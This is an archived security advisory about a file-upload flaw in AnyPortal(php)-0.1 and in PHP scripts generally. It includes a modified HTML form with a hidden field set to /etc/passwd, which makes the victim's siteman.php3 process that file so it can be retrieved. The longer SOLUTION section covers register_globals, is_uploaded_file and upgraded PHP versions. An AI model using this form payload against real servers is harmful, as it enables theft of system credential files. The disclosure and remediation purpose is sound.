COMMAND

    AnyPortal(php)-0.1

SYSTEMS AFFECTED

    AnyPortal(php)-0.1

PROBLEM

    'zorgon' found following.   Secure Reality Pty Ltd.  has published
    the Security Advisory #1 (SRADV00001):

        http://oliver.efri.hr/~crv/security/bugs/Others/php2.html

    'zorgon'  reproduced  this  vulnerability with AnyPortal(php)-0.1.
    It is supposed that AnyPortal is installed by defaut.

    Create a file  on your local  computer called upload.html  (if you
    want) with the source code of this page:

        http://www.victim.com/siteman000510/siteman.php3?A=U&D=

    Modify this part of code::

        <FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
        <P>PATHNAME OF LOCAL FILE<BR>
        <INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
        <INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
        <INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>

    By:

        <FORM ENCTYPE="multipart/form-data" METHOD="POST" ACTION="http://www.victim.com/siteman000510/siteman.php3">DESTINATION DIRECTORY:<B> /</B>
        <P>PATHNAME OF LOCAL FILE<BR>
        <INPUT TYPE="HIDDEN" NAME="DIR" VALUE="/">
        <INPUT TYPE="HIDDEN" NAME="POSTACTION" VALUE="UPLOAD">
        <INPUT SIZE=30 TYPE="FILE" NAME="FN"></P>
        <INPUT TYPE="HIDDEN" NAME="FN" VALUE="/etc/passwd"></P>
        <INPUT TYPE="HIDDEN" NAME="FN_name" VALUE="passwd">

    Also, you can retrieve the passwd file on the web server.

    The problem  is not  in the  source code  of PHP,  and is thus not
    related  to  any  particular  version  of  PHP;  However, many PHP
    scripts may suffer  from it, because  there was no  standard, easy
    way  of  testing  whether  a  certain  file  is indeed a temporary
    uploaded file, or any other file  on the system.  This means  that
    the previous posts on Bugtraq  were not accurate - there's  no way
    to  make  a  patch  for  PHP  that  prevents  scripts  from  being
    vulnerable to this  exploit, the logic  in the scripts  themselves
    has to be modified.

    Note  that  prior   to  PHP  4.0,   there  is  no   way  to   turn
    'register_globals'  off,  thus  eliminating  the ability of remote
    attackers to define variables in PHP's global scope (it's possible
    to prevent PHP  3.0 from processing  HTTP variables completely  by
    setting gpc_order to "" in php.ini, but there's no convenient  way
    to access HTTP data that way).

SOLUTION

    PHP supports  RFC 1867  based file  uploads.   PHP saves  uploaded
    files in a  temporary directory on  the server, using  a temporary
    name.  This temporary name is  exposed to the PHP script as  $FOO,
    where "FOO" is  the name of  the file input  tag in the  submitted
    form.  Many  PHP scripts process  $FOO without taking  measures to
    ensure that  it is  in fact  a file  that resides  in a  temporary
    directory.   It's  possible  for  a  remote  attacker  to   supply
    arbitrary file names as values  for FOO, by submitting a  standard
    form input  tag by  that name,  and thus  cause the  PHP script to
    process arbitrary files.

    Never trust  any input  that may  be coming  from the remote user.
    Always test whether  the variable you  expect to contain  the path
    of an upload  file, actually contains  a file path  of a temporary
    file  in  the  system.    It  is  strongly  recommended  to   turn
    register_globals off if possible.  If register_globals is off, you
    can  safely  check  $HTTP_POST_VARS[]  for  information  about the
    upload files  (see below).   If register_globals  is kept  on, one
    must  realize  that  any  variable  in  the  global scope might be
    overwritten by remote user input.

    New versions of PHP  have been packaged (4.0.3RC1  and 3.0.17RC1),
    to  make  it  easier  to  secure  scripts from this vulnerability.
    They  include  a  new  function  that  make  it  easy to determine
    whether a certain filename is a temporary uploaded file or not:

        /* Test whether a file is an uploaded file or not */
        is_uploaded_file($path);

    PHP 4.0.3 also features a new convenience function:

        /* Move an uploaded file to a new location.  If the file is not
          * a valid upload file, no action will take place.
          */
        move_uploaded_file($path, $new_path);

    In   addition,   as   of   PHP    4.0.3,   it's   safe   to    use
    $HTTP_POST_FILES["FOO"]["tmp_name"] - which  cannot be written  to
    by any remote user input,  even when register_globals is on.   The
    new versions are currently in testing, and thus have the RC tag.

    PHP 4.0.3RC1:

        http://www.php.net/do_download.php?download_file=php-4.0.3RC1.tar.gz

    PHP 3.0.17RC1 (upgrading to PHP 4.0 is strongly recommended):

        http://www.php.net/distributions/php-3.0.17RC1.tar.gz